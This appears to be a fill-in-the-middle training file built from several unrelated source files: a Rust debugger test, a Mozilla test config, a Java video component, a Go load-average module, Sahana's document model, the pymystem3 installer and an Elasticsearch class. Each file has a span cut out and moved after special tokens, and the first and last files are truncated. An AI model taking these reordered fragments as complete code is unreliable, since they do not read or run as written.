-1; let int_ref: &int = &*int_box; let char_box: Box<char> = box 'a'; let char_ref: &char = &*char_box; let i8_box: Box<i8> = box 68; let i8_ref: &i8 = &*i8_box; let i16_box: Box<i16> = box -16; let i16_ref: &i16 = &*i16_box; let i32_box: Box<i32> = box -32; let i32_ref: &i32 = &*i32_box; let i64_box: Box<i64> = box -64; let i64_ref: &i64 = &*i64_box; let uint_box: Box<uint> = box 1; let uint_ref: &uint = &*uint_box; let u8_box: Box<u8> = box 100; let u8_ref: &u8 = &*u8_box; let u16_box: Box<u16> = box 16; let u16_ref: &u16 = &*u16_box; let u32_box: Box<u32> = box 32; let u32_ref: &u32 = &*u32_box; let u64_box: Box<u64> = box 64; let u64_ref: &u64 = &*u64_box; let f32_box: Box<f32> = box 2.5; let f32_ref: &f32 = &*f32_box; let f64_box: Box<f64> = box 3.5; let f64_ref: &f64 = &*f64_box; zzz(); // #break } fn zzz() {()}<|fim▁end|>
#![feature(box_syntax)] #![omit_gdb_pretty_printer_section]
<|file_name|>prod_config_windows.py<|end_file_name|><|fim▁begin|># ***** BEGIN LICENSE BLOCK ***** # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this file, # You can obtain one at http://mozilla.org/MPL/2.0/. # ***** END LICENSE BLOCK ***** # This is a template config file for web-platform-tests test. import os import sys config = { <|fim▁hole|> "--config=%(test_path)s/wptrunner.ini", "--ca-cert-path=%(test_path)s/certs/cacert.pem", "--host-key-path=%(test_path)s/certs/web-platform.test.key", "--host-cert-path=%(test_path)s/certs/web-platform.test.pem", "--certutil-binary=%(test_install_path)s/bin/certutil", ], "exes": { 'python': sys.executable, 'virtualenv': [sys.executable, 'c:/mozilla-build/buildbotve/virtualenv.py'], 'hg': 'c:/mozilla-build/hg/hg', 'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(), '%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()], 'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'], }, "find_links": [ "http://pypi.pvt.build.mozilla.org/pub", "http://pypi.pub.build.mozilla.org/pub", ], "pip_index": False, "buildbot_json_path": "buildprops.json", "default_blob_upload_servers": [ "https://blobupload.elasticbeanstalk.com", ], "blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"), "download_minidump_stackwalk": True, }<|fim▁end|>
"options": [ "--prefs-root=%(test_path)s/prefs", "--processes=1",
<|file_name|>WVideo.java<|end_file_name|><|fim▁begin|>package com.github.bordertech.wcomponents; import com.github.bordertech.wcomponents.util.Util; import java.util.Arrays; import java.util.List; import java.util.Map; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; /** * WVideo is used to display video content on the client. * * @author Yiannis Paschalidis * @since 1.0.0 */ public class WVideo extends AbstractWComponent implements Targetable, AjaxTarget, Disableable { /** * The logger instance for this class. */ private static final Log LOG = LogFactory.getLog(WVideo.class); <|fim▁hole|> /** * This request parameter is used to determine which video clip to serve up. */ private static final String VIDEO_INDEX_REQUEST_PARAM_KEY = "WVideo.videoIndex"; /** * This request parameter is used to determine which track to serve up. */ private static final String TRACK_INDEX_REQUEST_PARAM_KEY = "WVideo.trackIndex"; /** * This request parameter is used to request the poster image. */ private static final String POSTER_REQUEST_PARAM_KEY = "WVideo.poster"; /** * This is used to indicate whether pre-loading of content should occur before the clip is played. */ public enum Preload { /** * Do not pre-load any data. */ NONE, /** * Preload meta-data only. */ META_DATA, /** * Let the client determine what to load. */ AUTO } /** * This is used to indicate which playback controls to display for the video. * * <p> * <strong>Note:</strong> * Advancements in video support in clients since this API was first implemented means that most of this is now * redundant. Under most circumstances the UI will display their native video controls. Where a particular WVideo * does not have any source which is able to be played by the client then links to all sources will be provided. * This enum is not worthless as the values NONE and PLAY_PAUSE are used to turn off native video controls in the * client. The value NONE however causes major problems and is incompatible with autoplay for a11y reasons so it * basically makes the media worthless. This enum may be replaced in the future with a simple boolean to trigger * native controls or play/pause only (see https://github.com/BorderTech/wcomponents/issues/503). * </p> */ public enum Controls { /** * Do not display any controls: not recommended. May be incompatible with any of {@link #isAutoplay()} == true, * {@link #isMuted()} == true or {@link #isLoop()} == true. If this value is set then the WVideo control * <strong>MAY NOT WORK AT ALL</strong>. * @deprecated since 1.1.1 as this is incompatible with WCAG requirements. */ NONE, /** * Display all controls. * @deprecated since 1.1.1 as themes use native video controls. */ ALL, /** * A combined play/pause button. */ PLAY_PAUSE, /** * Displays the "default" set of controls for the theme. * @deprecated since 1.1.1 as themes use native video controls. */ DEFAULT, /** * Displays the client's native set of controls. */ NATIVE } /** * Creates a WVideo with no video clips. Video clips must be added later by calling one of the setVideo(...) * methods. */ public WVideo() { } /** * Creates a WVideo with the given video clip. * * @param video the video clip. */ public WVideo(final Video video) { this(new Video[]{video}); } /** * <p> * Creates a WVideo with the given static content. This is provided as a convenience method for when the video file * is included as static content in the class path rather than in the web application's resources. * </p> * <p> * The mime type for the video clip is looked up from the "mimeType.*" mapping configuration parameters using the * resource's file extension. * </p> * * @param resource the resource path to the video file. */ public WVideo(final String resource) { this(new VideoResource(resource)); } /** * Creates a WVideo with the given video clip in multiple formats. The client will try to load the first video clip, * and if it fails or isn't supported, it will move on to the next video clip. Only the first clip which can be * played on the client will be used. * * @param video multiple formats for the same the video clip. */ public WVideo(final Video[] video) { setVideo(video); } /** * Sets the video clip. * * @param video the video clip. */ public void setVideo(final Video video) { setVideo(new Video[]{video}); } /** * Sets the video clip in multiple formats. The client will try to load the first video clip, and if it fails or * isn't supported, it will move on to the next video clip. Only the first clip which can be played on the client * will be used. * * @param video multiple formats for the same the video clip. */ public void setVideo(final Video[] video) { List<Video> list = video == null ? null : Arrays.asList(video); getOrCreateComponentModel().video = list; } /** * Retrieves the video clips associated with this WVideo. * * @return the video clips, may be null. */ public Video[] getVideo() { List<Video> list = getComponentModel().video; return list == null ? null : list.toArray(new Video[]{}); } /** * Indicates whether the video component is disabled. * * @return true if the component is disabled, otherwise false. */ @Override public boolean isDisabled() { return isFlagSet(ComponentModel.DISABLED_FLAG); } /** * Sets whether the video component is disabled. * * @param disabled if true, the component is disabled. If false, it is enabled. */ @Override public void setDisabled(final boolean disabled) { setFlag(ComponentModel.DISABLED_FLAG, disabled); } /** * @return true if the clip should start playing automatically, false for a manual start. */ public boolean isAutoplay() { return getComponentModel().autoplay; } /** * Sets whether the clip should play automatically. * * @param autoplay true to start playing automatically, false for a manual start. */ public void setAutoplay(final boolean autoplay) { getOrCreateComponentModel().autoplay = autoplay; } /** * @return the media group name. */ public String getMediaGroup() { return getComponentModel().mediaGroup; } /** * Sets the media group. * * @param mediaGroup The media group name. */ public void setMediaGroup(final String mediaGroup) { getOrCreateComponentModel().mediaGroup = mediaGroup; } /** * Indicates whether the video clip playback should loop. * * @return true to loop, false to stop at the end. */ public boolean isLoop() { return getComponentModel().loop; } /** * Sets whether the video clip playback should loop or stop at the end. * * @param loop true to loop, false to stop at the end. */ public void setLoop(final boolean loop) { getOrCreateComponentModel().loop = loop; } /** * Indicates whether the video's audio should initially be muted. * * @return true if muted, false otherwise. */ public boolean isMuted() { return getComponentModel().muted; } /** * Sets whether the video's audio should initially be muted. * * @param muted true to mute the audio, false to play normally. */ public void setMuted(final boolean muted) { getOrCreateComponentModel().muted = muted; } /** * Indicates which playback controls (e.g. stop/start/pause) to display on the video component. * * @return the playback controls to display. */ public Controls getControls() { return getComponentModel().controls; } /** * Sets which playback controls (e.g. stop/start/pause) to display on the video component. The values of * {@link Controls#NONE} and {@link Controls#ALL} take precedence over all other values. Passing a null or empty set * of controls will cause the client's default set of controls to be used. * * @param controls the playback controls to display. */ public void setControls(final Controls controls) { getOrCreateComponentModel().controls = controls; } /** * Indicates how pre-loading of content should occur before the clip is played. * * @return the pre-loading mode. */ public Preload getPreload() { return getComponentModel().preload; } /** * Sets how pre-loading of content should occur before the clip is played. * * @param preload the pre-loading mode. */ public void setPreload(final Preload preload) { getOrCreateComponentModel().preload = preload; } /** * @return alternative text to display when the video clip can not be played. */ public String getAltText() { return getComponentModel().altText; } /** * Sets the alternative text to display when the video clip can not be played. * * @param altText the text to set. */ public void setAltText(final String altText) { getOrCreateComponentModel().altText = altText; } /** * @return the width of the video playback region on the client, in pixels. */ public int getWidth() { return getComponentModel().width; } /** * Sets the width of the video playback region on the client. * * @param width the width of the video playback region, in pixels. */ public void setWidth(final int width) { getOrCreateComponentModel().width = width; } /** * @return the height of the video playback region on the client, in pixels. */ public int getHeight() { return getComponentModel().height; } /** * Sets the height of the video playback region on the client. * * @param height the height of the video playback region, in pixels. */ public void setHeight(final int height) { getOrCreateComponentModel().height = height; } /** * Retrieves the default poster image. The poster image is displayed by the client when the video is not playing. * * @return the default poster image. */ public Image getPoster() { return getComponentModel().poster; } /** * Sets the default poster image. The poster image is displayed by the client when the video is not playing. * * @param poster the default poster image. */ public void setPoster(final Image poster) { getOrCreateComponentModel().poster = poster; } /** * Sets the tracks for the video. The tracks are used to provide additional information relating to the video, for * example subtitles. * * @param tracks additional tracks relating to the video. */ public void setTracks(final Track[] tracks) { List<Track> list = tracks == null ? null : Arrays.asList(tracks); getOrCreateComponentModel().tracks = list; } /** * Retrieves additional tracks associated with the video. The tracks provide additional information relating to the * video, for example subtitles. * * @return the video clips, may be null. */ public Track[] getTracks() { List<Track> list = getComponentModel().tracks; return list == null ? null : list.toArray(new Track[]{}); } /** * Creates dynamic URLs that the video clips can be loaded from. In fact the URL points to the main application * servlet, but includes a non-null for the parameter associated with this WComponent (ie, its label). The * handleRequest method below detects this when the browser requests a file. * * @return the urls to load the video files from, or null if there are no clips defined. */ public String[] getVideoUrls() { Video[] video = getVideo(); if (video == null || video.length == 0) { return null; } String[] urls = new String[video.length]; // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); for (int i = 0; i < urls.length; i++) { parameters.put(VIDEO_INDEX_REQUEST_PARAM_KEY, String.valueOf(i)); urls[i] = WebUtilities.getPath(url, parameters, true); } return urls; } /** * Creates dynamic URLs that the video clips can be loaded from. In fact the URL points to the main application * servlet, but includes a non-null for the parameter associated with this WComponent (ie, its label). The * handleRequest method below detects this when the browser requests a file. * * @return the urls to load the video files from, or null if there are no clips defined. */ public String[] getTrackUrls() { Track[] tracks = getTracks(); if (tracks == null || tracks.length == 0) { return null; } String[] urls = new String[tracks.length]; // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); for (int i = 0; i < urls.length; i++) { parameters.put(TRACK_INDEX_REQUEST_PARAM_KEY, String.valueOf(i)); urls[i] = WebUtilities.getPath(url, parameters, true); } return urls; } /** * Creates a dynamic URL that the poster can be loaded from. In fact the URL points to the main application servlet, * but includes a non-null for the parameter associated with this WComponent (ie, its label). The handleRequest * method below detects this when the browser requests a file. * * @return the url to load the poster from, or null if there is no poster defined. */ public String getPosterUrl() { Image poster = getComponentModel().poster; if (poster == null) { return null; } // this variable needs to be set in the portlet environment. String url = getEnvironment().getWServletPath(); Map<String, String> parameters = getBaseParameterMap(); parameters.put(POSTER_REQUEST_PARAM_KEY, "x"); return WebUtilities.getPath(url, parameters, true); } /** * Retrieves the base parameter map for serving content (videos + tracks). * * @return the base map for serving content. */ private Map<String, String> getBaseParameterMap() { Environment env = getEnvironment(); Map<String, String> parameters = env.getHiddenParameters(); parameters.put(Environment.TARGET_ID, getTargetId()); if (Util.empty(getCacheKey())) { // Add some randomness to the URL to prevent caching String random = WebUtilities.generateRandom(); parameters.put(Environment.UNIQUE_RANDOM_PARAM, random); } else { // Remove step counter as not required for cached content parameters.remove(Environment.STEP_VARIABLE); parameters.remove(Environment.SESSION_TOKEN_VARIABLE); // Add the cache key parameters.put(Environment.CONTENT_CACHE_KEY, getCacheKey()); } return parameters; } /** * Override isVisible to also return false if there are no video clips to play. * * @return true if this component is visible in the given context, otherwise false. */ @Override public boolean isVisible() { if (!super.isVisible()) { return false; } Video[] video = getVideo(); return video != null && video.length > 0; } /** * When an video element is rendered to the client, the browser will make a second request to get the video content. * The handleRequest method has been overridden to detect whether the request is the "content fetch" request by * looking for the parameter that we encode in the content url. * * @param request the request being responded to. */ @Override public void handleRequest(final Request request) { super.handleRequest(request); String targ = request.getParameter(Environment.TARGET_ID); boolean contentReqested = (targ != null && targ.equals(getTargetId())); if (contentReqested && request.getParameter(POSTER_REQUEST_PARAM_KEY) != null) { handlePosterRequest(); } if (isDisabled()) { return; } if (contentReqested) { if (request.getParameter(VIDEO_INDEX_REQUEST_PARAM_KEY) != null) { handleVideoRequest(request); } else if (request.getParameter(TRACK_INDEX_REQUEST_PARAM_KEY) != null) { handleTrackRequest(request); } } } /** * Handles a request for the poster. */ private void handlePosterRequest() { Image poster = getComponentModel().poster; if (poster != null) { ContentEscape escape = new ContentEscape(poster); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested non-existant poster"); } } /** * Handles a request for a video. * * @param request the request being responded to. */ private void handleVideoRequest(final Request request) { String videoRequested = request.getParameter(VIDEO_INDEX_REQUEST_PARAM_KEY); int videoFileIndex = 0; try { videoFileIndex = Integer.parseInt(videoRequested); } catch (NumberFormatException e) { LOG.error("Failed to parse video index: " + videoFileIndex); } Video[] video = getVideo(); if (video != null && videoFileIndex >= 0 && videoFileIndex < video.length) { ContentEscape escape = new ContentEscape(video[videoFileIndex]); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested invalid video clip: " + videoFileIndex); } } /** * Handles a request for an auxillary track. * * @param request the request being responded to. */ private void handleTrackRequest(final Request request) { String trackRequested = request.getParameter(TRACK_INDEX_REQUEST_PARAM_KEY); int trackIndex = 0; try { trackIndex = Integer.parseInt(trackRequested); } catch (NumberFormatException e) { LOG.error("Failed to parse track index: " + trackIndex); } Track[] tracks = getTracks(); if (tracks != null && trackIndex >= 0 && trackIndex < tracks.length) { ContentEscape escape = new ContentEscape(tracks[trackIndex]); escape.setCacheable(!Util.empty(getCacheKey())); throw escape; } else { LOG.warn("Client requested invalid track: " + trackIndex); } } /** * @return the cacheKey */ public String getCacheKey() { return getComponentModel().cacheKey; } /** * @param cacheKey the cacheKey to set. */ public void setCacheKey(final String cacheKey) { getOrCreateComponentModel().cacheKey = cacheKey; } /** * Returns the id to use to target this component. * * @return this component's target id. */ @Override public String getTargetId() { return getId(); } /** * @return a String representation of this component, for debugging purposes. */ @Override public String toString() { String text = getAltText(); return toString(text == null ? null : ('"' + text + '"')); } // -------------------------------- // Extrinsic state management /** * Creates a new component model appropriate for this component. * * @return a new VideoModel. */ @Override protected VideoModel newComponentModel() { return new VideoModel(); } /** * {@inheritDoc} */ @Override // For type safety only protected VideoModel getComponentModel() { return (VideoModel) super.getComponentModel(); } /** * {@inheritDoc} */ @Override // For type safety only protected VideoModel getOrCreateComponentModel() { return (VideoModel) super.getOrCreateComponentModel(); } /** * Holds the extrinsic state information of a WVideo. */ public static class VideoModel extends ComponentModel { /** * The various video clips. */ private List<Video> video; /** * Additional tracks relating to the video, e.g. subtitles. */ private List<Track> tracks; /** * The cache key used to control client-side caching. */ private String cacheKey; /** * Indicates whether the video should play immediately after page load. */ private boolean autoplay; /** * Indicates whether playback of the video clip should be looped. */ private boolean loop; /** * Indicates whether audio should initially be muted. */ private boolean muted; /** * Indicates which playback controls to display. */ private Controls controls; /** * Indicates whether pre-loading of content should occur before the clip is played. */ private Preload preload = Preload.NONE; /** * Alternate text to display if the video clip can not be played. */ private String altText; /** * The width of the video playback region on the client, in pixels. */ private int width; /** * The height of the video playback region on the client, in pixels. */ private int height; /** * The poster image is displayed in place of the video, until it is loaded. */ private Image poster; /** * This is used to group related media together, for example to synchronize tracks. */ private String mediaGroup; } }<|fim▁end|>
<|file_name|>load_darwin.go<|end_file_name|><|fim▁begin|>// +build darwin package load import ( "os/exec" "strconv" "strings" "../common" ) func Avg() (*AvgStat, error) { values, err := common.DoSysctrl("vm.loadavg") if err != nil { return nil, err } load1, err := strconv.ParseFloat(values[0], 64) if err != nil { return nil, err } load5, err := strconv.ParseFloat(values[1], 64) if err != nil { return nil, err } load15, err := strconv.ParseFloat(values[2], 64) if err != nil { return nil, err } ret := &AvgStat{ Load1: float64(load1), Load5: float64(load5), Load15: float64(load15), } return ret, nil } // Misc returnes miscellaneous host-wide statistics. // darwin use ps command to get process running/blocked count. // Almost same as FreeBSD implementation, but state is different. // U means 'Uninterruptible Sleep'. func Misc() (*MiscStat, error) { bin, err := exec.LookPath("ps") if err != nil { return nil, err } out, err := invoke.Command(bin, "axo", "state") if err != nil { return nil, err } lines := strings.Split(string(out), "\n")<|fim▁hole|> if strings.Contains(l, "R") { ret.ProcsRunning++ } else if strings.Contains(l, "U") { // uninterruptible sleep == blocked ret.ProcsBlocked++ } } return &ret, nil }<|fim▁end|>
ret := MiscStat{} for _, l := range lines {
<|file_name|>doc.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ Sahana Eden Document Library @copyright: 2011-2012 (c) Sahana Software Foundation @license: MIT Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ __all__ = ["S3DocumentLibrary", "doc_image_represent"] import os from gluon import * from gluon.storage import Storage from ..s3 import * # ============================================================================= class S3DocumentLibrary(S3Model): names = ["doc_entity", "doc_document", "doc_image"] def model(self): T = current.T db = current.db s3 = current.response.s3 person_comment = self.pr_person_comment person_id = self.pr_person_id location_id = self.gis_location_id organisation_id = self.org_organisation_id messages = current.messages NONE = messages.NONE UNKNOWN_OPT = messages.UNKNOWN_OPT # Shortcuts add_component = self.add_component configure = self.configure crud_strings = s3.crud_strings define_table = self.define_table super_link = self.super_link # --------------------------------------------------------------------- # Document-referencing entities # entity_types = Storage(asset_asset=T("Asset"), irs_ireport=T("Incident Report"), project_project=T("Project"), project_activity=T("Project Activity"), project_task=T("Task"), hms_hospital=T("Hospital")) tablename = "doc_entity" doc_entity = self.super_entity(tablename, "doc_id", entity_types) # Components add_component("doc_document", doc_entity=self.super_key(doc_entity)) add_component("doc_image", doc_entity=self.super_key(doc_entity)) # --------------------------------------------------------------------- # Documents # tablename = "doc_document" table = define_table(tablename, super_link("site_id", "org_site"), super_link("doc_id", doc_entity), Field("file", "upload", autodelete=True), Field("name", length=128, notnull=True, # Allow Name to be added onvalidation requires = IS_NULL_OR(IS_LENGTH(128)), label=T("Name")), Field("url", label=T("URL"), requires = IS_NULL_OR(IS_URL()), represent = lambda url: \ url and A(url,_href=url) or NONE), person_id(label=T("Author"), comment=person_comment(T("Author"), T("The Author of this Document (optional)"))), organisation_id( widget = S3OrganisationAutocompleteWidget(default_from_profile=True) ), s3_date(label = T("Date Published")), location_id(), s3_comments(), #Field("entered", "boolean", label=T("Entered")), Field("checksum", readable=False, writable=False), *s3_meta_fields()) # Field configuration table.file.represent = lambda file, table=table: \ self.doc_file_represent(file, table) #table.location_id.readable = False #table.location_id.writable = False<|fim▁hole|> # _title="%s|%s" % (T("Entered"), # T("Has data from this Reference Document been entered into Sahana?"))) # CRUD Strings ADD_DOCUMENT = T("Add Reference Document") crud_strings[tablename] = Storage( title_create = ADD_DOCUMENT, title_display = T("Document Details"), title_list = T("Documents"), title_update = T("Edit Document"), title_search = T("Search Documents"), subtitle_create = T("Add New Document"), label_list_button = T("List Documents"), label_create_button = ADD_DOCUMENT, label_delete_button = T("Delete Document"), msg_record_created = T("Document added"), msg_record_modified = T("Document updated"), msg_record_deleted = T("Document deleted"), msg_list_empty = T("No Documents found") ) # Search Method? # Resource Configuration configure(tablename, onvalidation=self.document_onvalidation) # --------------------------------------------------------------------- # Images # # @ToDo: Field to determine which is the default image to use for # e.g. a Map popup (like the profile picture) # readable/writable=False except in the cases where-needed # doc_image_type_opts = { 1:T("Photograph"), 2:T("Map"), 3:T("Document Scan"), 99:T("other") } tablename = "doc_image" table = define_table(tablename, super_link("site_id", "org_site"), super_link("pe_id", "pr_pentity"), super_link("doc_id", doc_entity), Field("file", "upload", autodelete=True, requires = IS_NULL_OR( IS_IMAGE(extensions=(s3.IMAGE_EXTENSIONS) )), # upload folder needs to be visible to the download() function as well as the upload uploadfolder = os.path.join(current.request.folder, "uploads", "images")), Field("name", length=128, notnull=True, # Allow Name to be added onvalidation requires = IS_NULL_OR(IS_LENGTH(128)), label=T("Name")), Field("url", label=T("URL"), requires = IS_NULL_OR(IS_URL())), Field("type", "integer", requires = IS_IN_SET(doc_image_type_opts, zero=None), default = 1, label = T("Image Type"), represent = lambda opt: doc_image_type_opts.get(opt, UNKNOWN_OPT)), person_id(label=T("Author")), organisation_id( widget = S3OrganisationAutocompleteWidget(default_from_profile=True) ), location_id(), s3_date(label = T("Date Taken")), s3_comments(), Field("checksum", readable=False, writable=False), *s3_meta_fields()) # Field configuration table.file.represent = doc_image_represent # CRUD Strings ADD_IMAGE = T("Add Photo") crud_strings[tablename] = Storage( title_create = ADD_IMAGE, title_display = T("Photo Details"), title_list = T("Photos"), title_update = T("Edit Photo"), title_search = T("Search Photos"), subtitle_create = T("Add New Photo"), label_list_button = T("List Photos"), label_create_button = ADD_IMAGE, label_delete_button = T("Delete Photo"), msg_record_created = T("Photo added"), msg_record_modified = T("Photo updated"), msg_record_deleted = T("Photo deleted"), msg_list_empty = T("No Photos found")) # Search Method # Resource Configuration configure(tablename, onvalidation=lambda form: \ self.document_onvalidation(form, document=False)) # --------------------------------------------------------------------- # Pass model-global names to response.s3 # return Storage() # ------------------------------------------------------------------------- def defaults(self): """ Safe defaults if the module is disabled """ return Storage() # ------------------------------------------------------------------------- @staticmethod def doc_file_represent(file, table): """ File representation """ if file: return A(table.file.retrieve(file)[0], _href=URL(c="default", f="download", args=[file])) else: return current.messages.NONE # ------------------------------------------------------------------------- @staticmethod def document_represent(id): """ Foreign key representation """ if not id: return current.messages.NONE db = current.db table = db.doc_document record = db(table.id == id).select(table.name, limitby=(0, 1)).first() try: return A(record.name, _href = URL(c="doc", f="document", args=[id], extension=""), _target = "blank") except: return current.messages.UNKNOWN_OPT # ------------------------------------------------------------------------- @staticmethod def document_onvalidation(form, document=True): """ Form validation for both, documents and images """ import cgi T = current.T db = current.db vars = form.vars if document: tablename = "doc_document" msg = T("Either file upload or document URL required.") else: tablename = "doc_image" msg = T("Either file upload or image URL required.") table = db[tablename] doc = vars.file url = vars.url if not hasattr(doc, "file"): id = current.request.post_vars.id if id: record = db(table.id == id).select(table.file, limitby=(0, 1)).first() if record: doc = record.file if not hasattr(doc, "file") and not doc and not url: form.errors.file = msg form.errors.url = msg # Do a checksum on the file to see if it's a duplicate if isinstance(doc, cgi.FieldStorage) and doc.filename: f = doc.file vars.checksum = doc_checksum(f.read()) f.seek(0) if not vars.name: vars.name = doc.filename if vars.checksum is not None: # Duplicate allowed if original version is deleted query = ((table.checksum == vars.checksum) & \ (table.deleted == False)) result = db(query).select(table.name, limitby=(0, 1)).first() if result: doc_name = result.name form.errors["file"] = "%s %s" % \ (T("This file already exists on the server as"), doc_name) return # ============================================================================= def doc_image_represent(filename): """ Represent an image as a clickable thumbnail @param filename: name of the image file """ return DIV(A(IMG(_src=URL(c="default", f="download", args=filename), _height=40), _class="zoom", _href=URL(c="default", f="download", args=filename))) # @todo: implement/activate the JavaScript for this: #import uuid #anchor = "zoom-media-image-%s" % uuid.uuid4() #return DIV(A(IMG(_src=URL(c="default", f="download", #args=filename), #_height=40), #_class="zoom", #_href="#%s" % anchor), #DIV(IMG(_src=URL(c="default", f="download", #args=filename), #_width=600), #_id="%s" % anchor, #_class="hide")) # ============================================================================= def doc_checksum(docstr): """ Calculate a checksum for a file """ import hashlib converted = hashlib.sha1(docstr).hexdigest() return converted # END =========================================================================<|fim▁end|>
#table.entered.comment = DIV(_class="tooltip",
<|file_name|>installer.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- import platform import os import sys from .constants import (MYSTEM_BIN, MYSTEM_EXE, MYSTEM_DIR) _TARBALL_URLS = { 'linux': { '32bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-linux3.5-32bit.tar.gz", '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-linux3.1-64bit.tar.gz", }, 'darwin': "http://download.cdn.yandex.net/mystem/mystem-3.0-macosx10.8.tar.gz", 'win': { '32bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-win7-32bit.zip", '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-win7-64bit.zip", }, 'freebsd': { '64bit': "http://download.cdn.yandex.net/mystem/mystem-3.0-freebsd9.0-64bit.tar.gz", } } def autoinstall(out=sys.stderr): """ Install mystem binary as :py:const:`~pymystem3.constants.MYSTEM_BIN`. Do nothing if already installed.<|fim▁hole|> """ if os.path.isfile(MYSTEM_BIN): return install(out) def install(out=sys.stderr): """ Install mystem binary as :py:const:`~pymystem3.constants.MYSTEM_BIN`. Overwrite if already installed. """ import requests import tempfile url = _get_tarball_url() print("Installing mystem to %s from %s" % (MYSTEM_BIN, url), file=out) if not os.path.isdir(MYSTEM_DIR): os.makedirs(MYSTEM_DIR) tmp_fd, tmp_path = tempfile.mkstemp() try: r = requests.get(url, stream=True) with os.fdopen(tmp_fd, 'wb') as fd: for chunk in r.iter_content(64 * 1024): fd.write(chunk) fd.flush() if url.endswith('.tar.gz'): import tarfile with tarfile.open(tmp_path) as tar: tar.extract(MYSTEM_EXE, MYSTEM_DIR) elif url.endswith('.zip'): import zipfile with zipfile.ZipFile(tmp_path) as zip: zip.extractall(MYSTEM_DIR) else: raise NotImplementedError("Could not install mystem from %s" % url) finally: os.unlink(tmp_path) def _get_on_prefix(kvs, key): for k, v in kvs.items(): if key.startswith(k): return v return None def _get_tarball_url(): bits, _ = platform.architecture() url = _get_on_prefix(_TARBALL_URLS, sys.platform) if url is None: raise NotImplementedError("Your system is not supported. Feel free to report bug or make a pull request.") if isinstance(url, str): return url url = url.get(bits, None) if url is None: raise NotImplementedError("Your system is not supported. Feel free to report bug or make a pull request.") return url<|fim▁end|>
<|file_name|>AnalysisService.java<|end_file_name|><|fim▁begin|>/* * Licensed to ElasticSearch and Shay Banon under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. ElasticSearch licenses this * file to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.index.analysis; import com.google.common.collect.ImmutableMap; import org.apache.lucene.analysis.Analyzer; import org.elasticsearch.ElasticSearchIllegalArgumentException; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.Strings; import org.elasticsearch.common.component.CloseableComponent; import org.elasticsearch.common.inject.Inject; import org.elasticsearch.common.settings.ImmutableSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.index.AbstractIndexComponent; import org.elasticsearch.index.Index; import org.elasticsearch.index.settings.IndexSettings; import org.elasticsearch.indices.analysis.IndicesAnalysisService; import java.util.Map; import static com.google.common.collect.Maps.newHashMap; /** * */ public class AnalysisService extends AbstractIndexComponent implements CloseableComponent { private final ImmutableMap<String, NamedAnalyzer> analyzers; private final ImmutableMap<String, TokenizerFactory> tokenizers; private final ImmutableMap<String, CharFilterFactory> charFilters; private final ImmutableMap<String, TokenFilterFactory> tokenFilters; private final NamedAnalyzer defaultAnalyzer; private final NamedAnalyzer defaultIndexAnalyzer; private final NamedAnalyzer defaultSearchAnalyzer; private final NamedAnalyzer defaultSearchQuoteAnalyzer; public AnalysisService(Index index) { this(index, ImmutableSettings.Builder.EMPTY_SETTINGS, null, null, null, null, null); } @Inject<|fim▁hole|> @Nullable Map<String, TokenizerFactoryFactory> tokenizerFactoryFactories, @Nullable Map<String, CharFilterFactoryFactory> charFilterFactoryFactories, @Nullable Map<String, TokenFilterFactoryFactory> tokenFilterFactoryFactories) { super(index, indexSettings); Map<String, TokenizerFactory> tokenizers = newHashMap(); if (tokenizerFactoryFactories != null) { Map<String, Settings> tokenizersSettings = indexSettings.getGroups("index.analysis.tokenizer"); for (Map.Entry<String, TokenizerFactoryFactory> entry : tokenizerFactoryFactories.entrySet()) { String tokenizerName = entry.getKey(); TokenizerFactoryFactory tokenizerFactoryFactory = entry.getValue(); Settings tokenizerSettings = tokenizersSettings.get(tokenizerName); if (tokenizerSettings == null) { tokenizerSettings = ImmutableSettings.Builder.EMPTY_SETTINGS; } TokenizerFactory tokenizerFactory = tokenizerFactoryFactory.create(tokenizerName, tokenizerSettings); tokenizers.put(tokenizerName, tokenizerFactory); tokenizers.put(Strings.toCamelCase(tokenizerName), tokenizerFactory); } } if (indicesAnalysisService != null) { for (Map.Entry<String, PreBuiltTokenizerFactoryFactory> entry : 